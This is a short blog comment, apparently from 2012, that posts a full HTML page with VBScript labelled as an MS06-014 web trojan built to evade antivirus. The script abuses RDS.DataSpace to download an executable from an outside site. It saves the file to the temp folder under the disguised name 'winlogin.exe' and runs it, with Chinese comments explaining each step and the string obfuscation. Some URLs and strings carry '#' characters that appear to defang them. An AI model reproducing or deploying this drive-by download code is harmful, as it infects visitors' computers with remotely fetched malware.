brent's hut

# re: 一段植入木馬的html代碼 2012-06-25 14:47 往往v

< html >
< script language ="VBScript" >
on error resume next
' 即將下載的木馬
dl = " ht#tp://ww#w.800vv.com/cc/cj.exe# "
' 創(chuàng)建OBJECT元素
Set df = document.createElement( " object " )
' 指定OBJECT為RDS.DataSpace
' 該對(duì)象有一個(gè)方法名為CreateObject，
' helpstring("Creates a business object of the specified Progid over the specified connection")
df.setAttribute " classid " , " clsid:BD96C556-65A3-11D#0-983A-00C04F#C29E36 "
'
str = " Microsoft.XMLHTTP "
' RDS.DataSpace.CreateObject("Microsoft.XMLHTTP","")
Set x = df.CreateObject(str, "" )
' 4545
a1 = " A#do "
a2 = " db. "
a3 = " Str "
a4 = " eam "
' str5 = "Adodb.Stream" 分成這么多段是為了掩人耳目
str1 = a1 & a2 & a3 & a4
str5 = str1
' RDS.DataSpace.CreateObject("Ado#db.Str#eam","")
set S = df.createobject(str5, "" )
' 5455
S.type = 1
str6 = " GET "
' Microsoft.XMLHTTP.Open "GET" "ht#tp://ww#w.800vv.com/cc/cj.exe#" False
' 下載木馬
x.Open str6, dl, False
x.Send
' 本地文件名
fname1 = " winlogin.exe "
' 888
set F = df.createobject( " Scri#pting.FileSy#stemObject " , "" )
' 獲取臨時(shí)目錄
set tmp = F.GetSpecialFolder( 2 )
' 創(chuàng)建本地文件
fname1 = F.BuildPath(tmp,fname1)
' Adodb.Stream.open
S.open
' Adodb.Stream.write 木馬代碼
S.write x.responseBody
' Adodb.Stream.savetofile "臨時(shí)目錄\winlogin.exe"
S.savetofile fname1, 2
' 6551
S.close
' 458
set Q = df.createobject( " Shell.Application " , "" )
' 運(yùn)行 臨時(shí)目錄\winlogin.exe
Q.ShellExecute fname1, "" , ""
' 55
</ script >
< head >
< title > icexiaoyeMS06-014免殺網(wǎng)馬 </ title >
</ head >< body >
< center > icexiaoyeMS06-014免殺網(wǎng)馬 </ center >
</ body >

< script type ="text/jscript" >
function init() {
document.write(Date());

}
window.onload = init;
</ script >
</ html >  回復(fù)  更多評(píng)論